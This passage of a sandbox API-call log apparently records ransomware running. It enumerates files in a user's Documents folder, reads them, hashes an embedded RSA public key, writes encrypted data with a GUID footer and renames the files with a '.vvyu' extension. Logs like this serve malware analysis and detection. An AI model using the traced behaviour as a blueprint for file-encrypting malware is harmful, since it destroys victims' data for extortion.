hHeap=0x2c0000) returned 1 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6770 [0197.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6710 [0197.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0197.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6728 [0197.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66f8 [0197.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6788 [0197.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0197.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6758 [0197.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6740 [0197.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67a0 [0197.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6740 [0197.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0197.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0197.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6710 [0197.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0197.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0197.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0197.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0197.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0197.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea608 | out: hHeap=0x2c0000) returned 1 [0197.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.086] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xa66f, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xa66f, lpOverlapped=0x0) returned 1 [0197.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.087] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa674, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.087] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.089] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.089] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.089] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.089] CloseHandle (hObject=0x584) returned 1 [0197.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0197.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0197.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0197.091] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\w9_K2R1YG22qFB5WTF98.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\w9_k2r1yg22qfb5wtf98.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\w9_K2R1YG22qFB5WTF98.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\w9_k2r1yg22qfb5wtf98.ots.vvyu")) returned 1 [0197.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.093] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0197.095] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b8d2470, ftCreationTime.dwHighDateTime=0x1d8a2b0, ftLastAccessTime.dwLowDateTime=0x84929c70, ftLastAccessTime.dwHighDateTime=0x1d8a68d, ftLastWriteTime.dwLowDateTime=0x84929c70, ftLastWriteTime.dwHighDateTime=0x1d8a68d, nFileSizeHigh=0x0, nFileSizeLow=0x2f04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y3jGcUeT.odt", cAlternateFileName="")) returned 1 [0197.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0197.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.096] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\y3jGcUeT.odt") returned=".odt" [0197.096] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\y3jGcUeT.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\y3jgcuet.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.096] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=12036) returned 1 [0197.097] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.100] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.100] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.103] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.103] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x2f04, lpOverlapped=0x0) returned 1 [0197.104] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.104] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.104] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.104] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0197.105] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.105] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.105] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.105] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.105] GetLastError () returned 0x0 [0197.105] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.105] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0197.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.106] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.106] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.106] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2f00) returned 0x2af5168 [0197.106] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea608 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66e0 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea650 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66f8 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6728 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6788 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6740 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.107] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0197.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0197.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6788 [0197.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0197.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6740 [0197.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6728 [0197.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0197.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0197.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0197.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0197.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 